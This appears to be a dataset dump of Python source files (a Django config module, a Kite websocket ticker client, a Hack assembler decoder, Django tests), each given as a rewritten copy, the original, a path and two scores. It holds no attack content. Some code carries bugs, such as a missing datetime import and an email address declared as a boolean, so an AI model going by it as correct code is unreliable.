value_bytes = value.encode()
try:
Fernet(value_bytes)
except Exception as exc:
raise ValueError(f"EMAIL_VERIFICATION_KEY: {value}")
else:
return value_bytes
backend = environ.var(converter=_convert_backend, help='"console" or "smtp"')
host = environ.var(default=None, help=_PARAM_HELP)
port = environ.var(default=None, help=_PARAM_HELP)
user = environ.var(default=None, help=_PARAM_HELP)
password = environ.var(default=None, help=_PARAM_HELP)
use_tls = environ.bool_var(default=True)
default_from = environ.bool_var(help="Sender email address for automatic emails")
verification_key = environ.var(
default=None,
converter=_convert_verification_key,
help="SECRET_KEY for encrpyting the email verification token",
)
email = environ.group(Email)
@environ.config
class Static:
url = environ.var(
default="/static/",
help=(
"URL path generated for static files. "
"If you change this, backend won't serve static files with WhiteNoise anymore."
),
)
root = environ.var(
default="/project_noe/static_root",
help=(
"Where manage.py collectstatic put all static files. "
"The default value is where the static files are in the Docker container"
),
)
static = environ.group(Static)
default_time_slot_capacity = environ.var(default=30, converter=int)
@environ.config
class Szamlazzhu:
agent_key = environ.var()
invoice_prefix = environ.var()
szamlazzhu = environ.group(Szamlazzhu)
@environ.config
class SimplePay:
class Environment(enum.Enum):
SANDBOX = "sandbox"
LIVE = "live"
merchant = environ.var()
secret_key = environ.var()
ipn_url = environ.var()
use_live = environ.var(default=False)
environment = environ.var(name="SIMPLEPAY_ENVIRONMENT", converter=Environment)
def __attrs_post_init__(self):
self.use_live = self.environment is NoeConfig.SimplePay.Environment.LIVE
simplepay = environ.group(SimplePay)
def __attrs_post_init__(self):
if not self.allowed_cors_hosts and "*" not in self.allowed_hosts:
self.allowed_cors_hosts = self.allowed_hosts
def print_config_schema():
    """Print every supported environment variable with its default and help text."""
    print("Possible configuration environment variables:")
    config_schema = NoeConfig.generate_help(display_defaults=True)
    for line in config_schema.splitlines():
        # Workaround for wrongly generated variable names
        # (environ-config emits a leading "_" for private attrs).
        print("-", line.lstrip("_"))
# Read DEBUG straight from the environment: whether to load the .env file
# has to be decided *before* NoeConfig.from_environ() runs.
_django_debug = os.environ.get("DJANGO_DEBUG", False)
# bootstrapping is hard. environ-config can't handle this use-case
if _env_to_bool(_django_debug):
    # The dotenv package is installed only in a dev environment
    from dotenv import load_dotenv

    print("Loading environment variables from .env file")
    print()
    load_dotenv()

# Fail fast with a readable schema dump if any required variable is
# missing or malformed.
try:
    config = NoeConfig.from_environ()
except Exception as exc:
    print_config_schema()
    print()
    print("Error during loading environment variable:")
    exc_message = f"{exc.__class__.__name__}: {exc}"
    print(textwrap.indent(exc_message, " "))
sys.exit(1) | code/backend/project_noe/config.py | import os
import sys
import enum
import textwrap
from cryptography.fernet import Fernet
import environ
from environ._environ_config import _env_to_bool
def split_by_comma(value):
return tuple(e.strip() for e in value.split(","))
@environ.config(prefix="")
class NoeConfig:
debug = environ.bool_var(
default=False, name="DJANGO_DEBUG", help="SECURITY WARNING: Don't run with debug turned on in production!"
)
secret_key = environ.var(help="SECURITY WARNING: keep the secret key used in production secret!")
frontend_url = environ.var(help="Where the React frontend SPA is hosted")
backend_url = environ.var(help="Where the Django backend is hosted")
allowed_hosts = environ.var(default="*", converter=split_by_comma)
allowed_cors_hosts = environ.var(default=None, converter=lambda val: split_by_comma(val) if val else None)
behind_tls_proxy = environ.bool_var(
default=False,
help='Whether or not to set the "X-Forwarded-Proto" header to "https". Should be set to True behind a proxy.',
)
language_code = environ.var(default="hu-hu")
time_zone = environ.var(default="Europe/Budapest")
log_level = environ.var(default="INFO", help="Python logger log level")
sentry_dsn_url = environ.var(
default=None, name="SENTRY_DSN_URL", help="If you want to track exceptions with https://sentry.io",
)
@environ.config
class Database:
_DB_SQLITE_ENGINE = "django.db.backends.sqlite3"
_PARAM_HELP = "Not required for SQLite"
def _convert_database_engine(value):
if value == "postgresql":
return "django.db.backends.postgresql"
elif value in ("mysql", "mariadb"):
return "django.db.backends.mysql"
elif value in ("sqlite", "sqlite3"):
return NoeConfig.Database._DB_SQLITE_ENGINE
raise ValueError(
f'Invalid database engine: {value!r}\npossible values: "postgresql", "mysql", "mariadb", "sqlite"'
)
def _validate_param(obj, attribute, value):
if not value and obj.engine != NoeConfig.Database._DB_SQLITE_ENGINE:
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
engine = environ.var(converter=_convert_database_engine)
name = environ.var()
user = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
password = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
host = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
port = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
database = environ.group(Database)
@environ.config
class Email:
class Backend(enum.Enum):
CONSOLE = "console"
SMTP = "smtp"
_PARAM_HELP = "Required for SMTP only"
def _convert_backend(value):
backend = NoeConfig.Email.Backend(value)
return f"django.core.mail.backends.{backend.value}.EmailBackend"
def _validate_param(obj, attribute, value):
if not value and obj.backend == "smtp":
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
def _convert_verification_key(value):
if value is None:
raise ValueError("You need to generate an EMAIL_VERIFICATION_KEY.")
value_bytes = value.encode()
try:
Fernet(value_bytes)
except Exception as exc:
raise ValueError(f"EMAIL_VERIFICATION_KEY: {value}")
else:
return value_bytes
backend = environ.var(converter=_convert_backend, help='"console" or "smtp"')
host = environ.var(default=None, help=_PARAM_HELP)
port = environ.var(default=None, help=_PARAM_HELP)
user = environ.var(default=None, help=_PARAM_HELP)
password = environ.var(default=None, help=_PARAM_HELP)
use_tls = environ.bool_var(default=True)
default_from = environ.bool_var(help="Sender email address for automatic emails")
verification_key = environ.var(
default=None,
converter=_convert_verification_key,
help="SECRET_KEY for encrpyting the email verification token",
)
email = environ.group(Email)
@environ.config
class Static:
url = environ.var(
default="/static/",
help=(
"URL path generated for static files. "
"If you change this, backend won't serve static files with WhiteNoise anymore."
),
)
root = environ.var(
default="/project_noe/static_root",
help=(
"Where manage.py collectstatic put all static files. "
"The default value is where the static files are in the Docker container"
),
)
static = environ.group(Static)
default_time_slot_capacity = environ.var(default=30, converter=int)
@environ.config
class Szamlazzhu:
agent_key = environ.var()
invoice_prefix = environ.var()
szamlazzhu = environ.group(Szamlazzhu)
@environ.config
class SimplePay:
class Environment(enum.Enum):
SANDBOX = "sandbox"
LIVE = "live"
merchant = environ.var()
secret_key = environ.var()
ipn_url = environ.var()
use_live = environ.var(default=False)
environment = environ.var(name="SIMPLEPAY_ENVIRONMENT", converter=Environment)
def __attrs_post_init__(self):
self.use_live = self.environment is NoeConfig.SimplePay.Environment.LIVE
simplepay = environ.group(SimplePay)
def __attrs_post_init__(self):
if not self.allowed_cors_hosts and "*" not in self.allowed_hosts:
self.allowed_cors_hosts = self.allowed_hosts
def print_config_schema():
print("Possible configuration environment variables:")
config_schema = NoeConfig.generate_help(display_defaults=True)
for line in config_schema.splitlines():
# Workaround for wrongly generated variable names
print("-", line.lstrip("_"))
_django_debug = os.environ.get("DJANGO_DEBUG", False)
# bootstrapping is hard. environ-config can't handle this use-case
if _env_to_bool(_django_debug):
# The dotenv package is installed only in a dev environment
from dotenv import load_dotenv
print("Loading environment variables from .env file")
print()
load_dotenv()
try:
config = NoeConfig.from_environ()
except Exception as exc:
print_config_schema()
print()
print("Error during loading environment variable:")
exc_message = f"{exc.__class__.__name__}: {exc}"
print(textwrap.indent(exc_message, " "))
sys.exit(1) | 0.322206 | 0.077588 |
import six
import asyncio
import struct
import json
from autobahn.asyncio.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
class TickerClientProtocol(WebSocketClientProtocol):
    """Kite ticker autobahn WebSocket base protocol.

    Forwards connection and message events to the callbacks registered on
    the owning TickerClientFactory.
    """

    def onConnect(self, response):
        """
        Called when WebSocket server connection is established successfully.
        """
        # Expose this live protocol on the factory so the MainTicker
        # wrapper can send subscribe/mode frames through it.
        self.factory.ws = self
        self.factory.on_connect(self, response)

    def onOpen(self):
        """
        Called when the initial WebSocket opening handshake was completed.
        """
        print("WebSocket connection open.")

    def onMessage(self, payload, isBinary):
        """
        Called when a text or binary frame is received.
        """
        if self.factory.on_message:
            self.factory.on_message(self, payload, isBinary)

    def onClose(self, wasClean, code, reason):
        """
        Called when connection is closed.
        """
        print("WebSocket connection closed: {0}".format(reason))
class TickerClientFactory(WebSocketClientFactory):
    """
    WebSocketClientFactory with pluggable connect/message callbacks.
    """

    def __init__(self, *args, **kwargs):
        """
        Initialize callback placeholders before autobahn's own setup.
        """
        self.ws = None          # set to the live protocol instance on connect
        self.on_message = None  # callable(ws, payload, isBinary) or None
        self.on_connect = None  # callable(ws, response) or None
        super(TickerClientFactory, self).__init__(*args, **kwargs)
class MainTicker():
    """
    Main Ticker client for the Kite streaming API.
    """

    # Exchange map for ticker: the low byte of an instrument token
    # identifies the exchange segment (see _parse_binary).
    EXCHANGE_MAP = {
        "nse": 1,
        "nfo": 2,
        "cds": 3,
        "bse": 4,
        "bfo": 5,
        "bsecds": 6,
        "mcx": 7,
        "mcxsx": 8,
        "indices": 9
    }

    # Available streaming modes.
    MODE_FULL = "full"
    MODE_QUOTE = "quote"
    MODE_LTP = "ltp"
def __init__(self, api_key, access_token):
    """
    Initialise websocket client.

    Credentials are embedded in the websocket URL as query parameters.
    """
    self.ws_url = "wss://ws.kite.trade?api_key={}&access_token={}".format(api_key, access_token)
    # Placeholders for callbacks.
    self.on_ticks = None    # callable(ticker, ticks): parsed binary ticks
    self.on_connect = None  # callable(ticker, response)
    self.on_message = None  # callable(ticker, payload, isBinary): raw frames
def connect_ws(self):
    """
    Establish the websocket connection and run the event loop forever.

    Blocks the calling thread.
    """
    self.factory = TickerClientFactory(self.ws_url)
    self.factory.protocol = TickerClientProtocol
    # NOTE(review): factory.ws is still None at this point; self.ws only
    # becomes a live protocol when _on_connect fires. Confirm nothing
    # relies on self.ws before then.
    self.ws = self.factory.ws
    # Register private callback
    self.factory.on_connect = self._on_connect
    self.factory.on_message = self._on_message
    # Run an infinite loop using asyncio
    # NOTE(review): asyncio.get_event_loop() is deprecated for this use
    # since Python 3.10 — consider new_event_loop(); verify target version.
    loop = asyncio.get_event_loop()
    coro = loop.create_connection(self.factory, "ws.kite.trade", 443, ssl=True)
    loop.run_until_complete(coro)
    loop.run_forever()
def _on_connect(self, ws, response):
"""
proxy for on_connect
"""
self.ws = ws
if self.on_connect:
self.on_connect(self, response)
def subscribe(self, token_list):
"""
Subscribe to required list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "subscribe", "v": token_list})))
def set_mode(self, mode, token_list):
"""
Set streaming mode for the given list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "mode", "v": [mode, token_list]})))
def _on_message(self, ws, payload, isBinary):
    """
    Internal proxy for on_message; also feeds binary frames to on_ticks.
    """
    if self.on_message:
        self.on_message(self, payload, isBinary)
    # If the message is binary, parse it and send it to the callback.
    # Frames of 4 bytes or fewer carry no tick packets (heartbeats).
    if self.on_ticks and isBinary and len(payload) > 4:
        self.on_ticks(self, self._parse_binary(payload))
def _parse_binary(self, bin):
"""
Parse binary data to a (list of) ticks structure.
"""
packets = self._split_packets(bin) # split data to individual ticks packet
data = []
for packet in packets:
instrument_token = self._unpack_int(packet, 0, 4)
segment = instrument_token & 0xff # Retrive segment constant from instrument_token
# Add price divisor based on segment
# This factor converts paisa to rupees
if segment == self.EXCHANGE_MAP["cds"]:
divisor = 10000000.0
elif segment == self.EXCHANGE_MAP["bsecds"]:
divisor = 10000.0
else:
divisor = 100.0
# All indices are not tradable
tradable = False if segment == self.EXCHANGE_MAP["indices"] else True
# LTP packets
if len(packet) == 8:
data.append({
"tradable": tradable,
"mode": self.MODE_LTP,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor
})
# Indices quote and full mode
elif len(packet) == 28 or len(packet) == 32:
mode = self.MODE_QUOTE if len(packet) == 28 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"ohlc": {
"high": self._unpack_int(packet, 8, 12) / divisor,
"low": self._unpack_int(packet, 12, 16) / divisor,
"open": self._unpack_int(packet, 16, 20) / divisor,
"close": self._unpack_int(packet, 20, 24) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Full mode with timestamp
if len(packet) == 32:
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 28, 32))
except Exception:
timestamp = None
d["exchange_timestamp"] = timestamp
data.append(d)
# Quote and full mode
elif len(packet) == 44 or len(packet) == 184:
mode = self.MODE_QUOTE if len(packet) == 44 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"last_traded_quantity": self._unpack_int(packet, 8, 12),
"average_traded_price": self._unpack_int(packet, 12, 16) / divisor,
"volume_traded": self._unpack_int(packet, 16, 20),
"total_buy_quantity": self._unpack_int(packet, 20, 24),
"total_sell_quantity": self._unpack_int(packet, 24, 28),
"ohlc": {
"open": self._unpack_int(packet, 28, 32) / divisor,
"high": self._unpack_int(packet, 32, 36) / divisor,
"low": self._unpack_int(packet, 36, 40) / divisor,
"close": self._unpack_int(packet, 40, 44) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Parse full mode
if len(packet) == 184:
try:
last_trade_time = datetime.fromtimestamp(self._unpack_int(packet, 44, 48))
except Exception:
last_trade_time = None
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 60, 64))
except Exception:
timestamp = None
d["last_trade_time"] = last_trade_time
d["oi"] = self._unpack_int(packet, 48, 52)
d["oi_day_high"] = self._unpack_int(packet, 52, 56)
d["oi_day_low"] = self._unpack_int(packet, 56, 60)
d["exchange_timestamp"] = timestamp
# Market depth entries.
depth = {
"buy": [],
"sell": []
}
# Compile the market depth lists.
for i, p in enumerate(range(64, len(packet), 12)):
depth["sell" if i >= 5 else "buy"].append({
"quantity": self._unpack_int(packet, p, p + 4),
"price": self._unpack_int(packet, p + 4, p + 8) / divisor,
"orders": self._unpack_int(packet, p + 8, p + 10, byte_format="H")
})
d["depth"] = depth
data.append(d)
return data
def _unpack_int(self, bin, start, end, byte_format="I"):
"""Unpack binary data as unsgined interger."""
return struct.unpack(">" + byte_format, bin[start:end])[0]
def _split_packets(self, bin):
    """Split the data to individual packets of ticks.

    Wire format: a big-endian uint16 packet count, then for each packet a
    uint16 length prefix followed by that many payload bytes.
    """
    # Ignore heartbeat data.
    if len(bin) < 2:
        return []
    number_of_packets = self._unpack_int(bin, 0, 2, byte_format="H")
    packets = []
    j = 2
    for i in range(number_of_packets):
        packet_length = self._unpack_int(bin, j, j + 2, byte_format="H")
        packets.append(bin[j + 2: j + 2 + packet_length])
        # Advance past the length prefix plus the payload just consumed.
        j = j + 2 + packet_length
return packets | async_ticker.py | import six
import asyncio
import struct
import json
from autobahn.asyncio.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
class TickerClientProtocol(WebSocketClientProtocol):
""" Kite ticker autobahn WebSocket base protocol """
def onConnect(self, response):
"""
Called when WebSocket server connection is established successfully
"""
self.factory.ws = self
self.factory.on_connect(self, response)
def onOpen(self):
"""
Called when the initial WebSocket opening handshake was completed
"""
print("WebSocket connection open.")
def onMessage(self, payload, isBinary):
"""
Called when text or payload is received.
"""
if self.factory.on_message:
self.factory.on_message(self, payload, isBinary)
def onClose(self, wasClean, code, reason):
"""
Called when connection is closed
"""
print("WebSocket connection closed: {0}".format(reason))
class TickerClientFactory(WebSocketClientFactory):
"""
Implement custom call backs for WebSocketClientFactory
"""
def __init__(self, *args, **kwargs):
"""
Initialize with callback methods
"""
self.ws = None
self.on_message = None
self.on_connect = None
super(TickerClientFactory, self).__init__(*args, **kwargs)
class MainTicker():
"""
Main Ticker client
"""
# Exchange map for ticker
EXCHANGE_MAP = {
"nse": 1,
"nfo": 2,
"cds": 3,
"bse": 4,
"bfo": 5,
"bsecds": 6,
"mcx": 7,
"mcxsx": 8,
"indices": 9
}
# Available streaming modes.
MODE_FULL = "full"
MODE_QUOTE = "quote"
MODE_LTP = "ltp"
def __init__(self, api_key, access_token):
"""
Initialise websocket client
"""
self.ws_url = "wss://ws.kite.trade?api_key={}&access_token={}".format(api_key, access_token)
# Placeholders for callbacks.
self.on_ticks = None
self.on_connect = None
self.on_message = None
def connect_ws(self):
"""
Establish ws connection
"""
self.factory = TickerClientFactory(self.ws_url)
self.factory.protocol = TickerClientProtocol
self.ws = self.factory.ws
# Register private callback
self.factory.on_connect = self._on_connect
self.factory.on_message = self._on_message
# Run an infinite loop using asyncio
loop = asyncio.get_event_loop()
coro = loop.create_connection(self.factory, "ws.kite.trade", 443, ssl=True)
loop.run_until_complete(coro)
loop.run_forever()
def _on_connect(self, ws, response):
"""
proxy for on_connect
"""
self.ws = ws
if self.on_connect:
self.on_connect(self, response)
def subscribe(self, token_list):
"""
Subscribe to required list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "subscribe", "v": token_list})))
def set_mode(self, mode, token_list):
"""
Set streaming mode for the given list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "mode", "v": [mode, token_list]})))
def _on_message(self, ws, payload, isBinary):
"""
proxy for on_message
"""
if self.on_message:
self.on_message(self, payload, isBinary)
# If the message is binary, parse it and send it to the callback.
if self.on_ticks and isBinary and len(payload) > 4:
self.on_ticks(self, self._parse_binary(payload))
def _parse_binary(self, bin):
"""
Parse binary data to a (list of) ticks structure.
"""
packets = self._split_packets(bin) # split data to individual ticks packet
data = []
for packet in packets:
instrument_token = self._unpack_int(packet, 0, 4)
segment = instrument_token & 0xff # Retrive segment constant from instrument_token
# Add price divisor based on segment
# This factor converts paisa to rupees
if segment == self.EXCHANGE_MAP["cds"]:
divisor = 10000000.0
elif segment == self.EXCHANGE_MAP["bsecds"]:
divisor = 10000.0
else:
divisor = 100.0
# All indices are not tradable
tradable = False if segment == self.EXCHANGE_MAP["indices"] else True
# LTP packets
if len(packet) == 8:
data.append({
"tradable": tradable,
"mode": self.MODE_LTP,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor
})
# Indices quote and full mode
elif len(packet) == 28 or len(packet) == 32:
mode = self.MODE_QUOTE if len(packet) == 28 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"ohlc": {
"high": self._unpack_int(packet, 8, 12) / divisor,
"low": self._unpack_int(packet, 12, 16) / divisor,
"open": self._unpack_int(packet, 16, 20) / divisor,
"close": self._unpack_int(packet, 20, 24) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Full mode with timestamp
if len(packet) == 32:
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 28, 32))
except Exception:
timestamp = None
d["exchange_timestamp"] = timestamp
data.append(d)
# Quote and full mode
elif len(packet) == 44 or len(packet) == 184:
mode = self.MODE_QUOTE if len(packet) == 44 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"last_traded_quantity": self._unpack_int(packet, 8, 12),
"average_traded_price": self._unpack_int(packet, 12, 16) / divisor,
"volume_traded": self._unpack_int(packet, 16, 20),
"total_buy_quantity": self._unpack_int(packet, 20, 24),
"total_sell_quantity": self._unpack_int(packet, 24, 28),
"ohlc": {
"open": self._unpack_int(packet, 28, 32) / divisor,
"high": self._unpack_int(packet, 32, 36) / divisor,
"low": self._unpack_int(packet, 36, 40) / divisor,
"close": self._unpack_int(packet, 40, 44) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Parse full mode
if len(packet) == 184:
try:
last_trade_time = datetime.fromtimestamp(self._unpack_int(packet, 44, 48))
except Exception:
last_trade_time = None
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 60, 64))
except Exception:
timestamp = None
d["last_trade_time"] = last_trade_time
d["oi"] = self._unpack_int(packet, 48, 52)
d["oi_day_high"] = self._unpack_int(packet, 52, 56)
d["oi_day_low"] = self._unpack_int(packet, 56, 60)
d["exchange_timestamp"] = timestamp
# Market depth entries.
depth = {
"buy": [],
"sell": []
}
# Compile the market depth lists.
for i, p in enumerate(range(64, len(packet), 12)):
depth["sell" if i >= 5 else "buy"].append({
"quantity": self._unpack_int(packet, p, p + 4),
"price": self._unpack_int(packet, p + 4, p + 8) / divisor,
"orders": self._unpack_int(packet, p + 8, p + 10, byte_format="H")
})
d["depth"] = depth
data.append(d)
return data
def _unpack_int(self, bin, start, end, byte_format="I"):
"""Unpack binary data as unsgined interger."""
return struct.unpack(">" + byte_format, bin[start:end])[0]
def _split_packets(self, bin):
"""Split the data to individual packets of ticks."""
# Ignore heartbeat data.
if len(bin) < 2:
return []
number_of_packets = self._unpack_int(bin, 0, 2, byte_format="H")
packets = []
j = 2
for i in range(number_of_packets):
packet_length = self._unpack_int(bin, j, j + 2, byte_format="H")
packets.append(bin[j + 2: j + 2 + packet_length])
j = j + 2 + packet_length
return packets | 0.59749 | 0.154887 |
import allocate
# Function to decode parsed instruction into it's binary equivalents
def decoder(field1, field2, field3, labels):
    """Decode one parsed Hack instruction into its 16-bit binary string.

    For C-instructions, (field1, field2, field3) are (dest, comp, jump);
    for A-instructions, field1 holds the constant or symbol and the other
    fields are empty. ``labels`` maps label names to ROM addresses.
    """
    binString = ""
    if field1.isdigit() and field2 == "" and field3 == "":
        # @constant — numeric A-instruction.
        binString = toBinary(field1)
    elif (field2.isalnum() and field3.isalpha()) or (field1.isalpha() and field2 != "" and field3 == ""):
        # C-instruction: opcode prefix "111" + comp/dest/jump bits.
        s = lookUP(field1, field2, field3)
        binString = "111" + s
    else:
        # Symbolic A-instruction: predefined symbol, known label, or a
        # variable allocated on first use.
        try:
            s = lookUPsymbol(field1)
        except KeyError:
            if field1 in labels:
                binString = toBinary(labels[field1])
            else:
                binString = toBinary(allocate.variable(field1))
        except:
            # NOTE(review): this bare except returns a sentinel string that
            # would be emitted as if it were machine code — confirm whether
            # failing loudly would be safer here.
            binString = "some other error"
        else:
            binString = s
    return binString
# Convert a string value into binary with zero padding
def toBinary(x):
    """Render x (an int, or a numeric string) as a 16-bit zero-padded binary string."""
    value = int(x) if isinstance(x, str) else x
    return format(value, "b").zfill(16)
# LOOKUP tables
# JUMP look up table
def lookUPj(jump):
    """Map a jump mnemonic ('' for no jump) to its 3-bit machine code."""
    jump_codes = {
        "": "000", "JGT": "001", "JEQ": "010", "JGE": "011",
        "JLT": "100", "JNE": "101", "JLE": "110", "JMP": "111",
    }
    return jump_codes[jump]
# COMP look up table
def lookUPc(comp):
    """Map a comp mnemonic to its 7-bit (a + c1..c6) machine code.

    M-register comps share the c-bits of their A counterparts; only the
    leading a-bit differs (0 for A, 1 for M).
    """
    a_forms = {
        "0": "101010", "1": "111111", "-1": "111010",
        "D": "001100", "A": "110000",
        "!D": "001101", "!A": "110001",
        "-D": "001111", "-A": "110011",
        "D+1": "011111", "A+1": "110111",
        "D-1": "001110", "A-1": "110010",
        "D+A": "000010", "D-A": "010011", "A-D": "000111",
        "D&A": "000000", "D|A": "010101",
    }
    if comp in a_forms:
        return "0" + a_forms[comp]
    # Translate the M form to its A twin and flip the a-bit.
    return "1" + a_forms[comp.replace("M", "A")]
# DEST look up table
def lookUPd(dest):
    """Map a dest mnemonic ('' for none) to its 3-bit d1 d2 d3 code."""
    dest_codes = {
        "": "000", "M": "001", "D": "010", "MD": "011",
        "A": "100", "AM": "101", "AD": "110", "AMD": "111",
    }
    return dest_codes[dest]
# Symbol look up table
def lookUPsymbol(symbol):
    """Map a predefined Hack symbol to its 16-bit binary RAM address.

    Raises KeyError for symbols that are not predefined (labels and
    variables are resolved elsewhere).
    """
    addresses = {"R" + str(i): i for i in range(16)}
    addresses.update({
        "SP": 0, "LCL": 1, "ARG": 2, "THIS": 3, "THAT": 4,
        "SCREEN": 16384, "KBD": 24576,
    })
    return format(addresses[symbol], "016b")
# Function to return correct sequence of binary strings
def lookUP(dest, comp, jump):
    """Assemble a C-instruction payload: comp bits, then dest, then jump."""
    dest = lookUPd(dest)
    comp = lookUPc(comp)
    jump = lookUPj(jump)
return comp+dest+jump | Project 6/assembler/Decoder.py | import allocate
# Function to decode parsed instruction into it's binary equivalents
def decoder(field1, field2, field3, labels):
binString = ""
if field1.isdigit() and field2 == "" and field3 == "":
binString = toBinary(field1)
elif (field2.isalnum() and field3.isalpha()) or (field1.isalpha() and field2 != "" and field3 == ""):
s = lookUP(field1, field2, field3)
binString = "111" + s
else:
try:
s = lookUPsymbol(field1)
except KeyError:
if field1 in labels:
binString = toBinary(labels[field1])
else:
binString = toBinary(allocate.variable(field1))
except:
binString = "some other error"
else:
binString = s
return binString
# Convert a string value into binary with zero padding
def toBinary(x):
if isinstance(x, str):
intVal = (int)(x)
else:
intVal = x
inbin = "{0:b}".format(intVal)
inbin = inbin.zfill(16)
return inbin
# LOOKUP tables
# JUMP look up table
def lookUPj(jump):
table = { "": "000",
"JGT": "001",
"JEQ": "010",
"JGE": "011",
"JLT": "100",
"JNE": "101",
"JLE": "110",
"JMP": "111"}
return table[jump]
# COMP look up table
def lookUPc(comp):
table = {"0" : "0101010",
"1" : "0111111",
"-1" : "0111010",
"D" : "0001100",
"A" : "0110000",
"!D" : "0001101",
"!A" : "0110001",
"-D" : "0001111",
"-A" : "0110011",
"D+1" : "0011111",
"A+1" : "0110111",
"D-1" : "0001110",
"A-1" : "0110010",
"D+A" : "0000010",
"D-A" : "0010011",
"A-D" : "0000111",
"D&A" : "0000000",
"D|A" : "0010101",
"M" : "1110000",
"!M" : "1110001",
"-M" : "1110011",
"M+1" : "1110111",
"M-1" : "1110010",
"D+M" : "1000010",
"D-M" : "1010011",
"M-D" : "1000111",
"D&M" : "1000000",
"D|M" : "1010101",}
return table[comp]
# DEST look up table
def lookUPd(dest):
table = { "": "000",
"M" : "001",
"D" : "010",
"MD" : "011",
"A" : "100",
"AM" : "101",
"AD" : "110",
"AMD": "111"}
return table[dest]
# Symbol look up table
def lookUPsymbol(symbol):
table = {"R0" : "0000000000000000",
"R1" : "0000000000000001",
"R2" : "0000000000000010",
"R3" : "0000000000000011",
"R4" : "0000000000000100",
"R5" : "0000000000000101",
"R6" : "0000000000000110",
"R7" : "0000000000000111",
"R8" : "0000000000001000",
"R9" : "0000000000001001",
"R10" : "0000000000001010",
"R11" : "0000000000001011",
"R12" : "0000000000001100",
"R13" : "0000000000001101",
"R14" : "0000000000001110",
"R15" : "0000000000001111",
"SCREEN" : "0100000000000000",
"KBD" : "0110000000000000",
"SP" : "0000000000000000",
"LCL" : "0000000000000001",
"ARG" : "0000000000000010",
"THIS" : "0000000000000011",
"THAT" : "0000000000000100"}
return table[symbol]
# Function to return correct sequence of binary strings
def lookUP(dest, comp, jump):
dest = lookUPd(dest)
comp = lookUPc(comp)
jump = lookUPj(jump)
return comp+dest+jump | 0.270191 | 0.323621 |
import json
import os
import unittest
from unittest import mock
from django import test
from django.conf import settings
from django.urls import reverse
import webtest
from config import wsgi
class TestBasicViews(test.TestCase):
def test_code_of_conduct(self):
response = self.client.get(reverse("code-of-conduct"))
self.assertContains(response, "<h1>Code of Conduct</h1>")
def test_coc_redirect(self):
"""The shortcuts '/coc' and '/coc/' paths should redirect to
the code of conduct page."""
response = self.client.get("/coc")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
response = self.client.get("/coc/")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
class TestHomepageMeetupEvents(test.TestCase):
def setUp(self):
fp = os.path.join(os.path.dirname(__file__), "data/meetup-events-api.json")
with open(fp) as fd:
self.api_response = json.load(fd)
self.expected_events = [
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbqb/",
"name": "Saturday Study Group",
"datetime": "2019-10-12T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbzb/",
"name": "Saturday Study Group",
"datetime": "2019-10-19T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/zgtnxqyznbgc/",
"name": "Monthly Meetup",
"datetime": "2019-10-24T19:00:00-07:00",
"venue": "Qualcomm Building Q",
},
]
@mock.patch("pythonsd.views.HomePageView.get_upcoming_events", return_value=[])
def test_no_events(self, mock_call):
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
def test_html_widget(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = True
mock_get.return_value.json.return_value = self.api_response
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
self.assertContains(response, "Qualcomm Building Q")
# Check that it is retreived from the cache
with mock.patch("pythonsd.views.requests.get") as mock_get:
# Return val shouldn't matter - will use cache
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
def test_api_failure(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
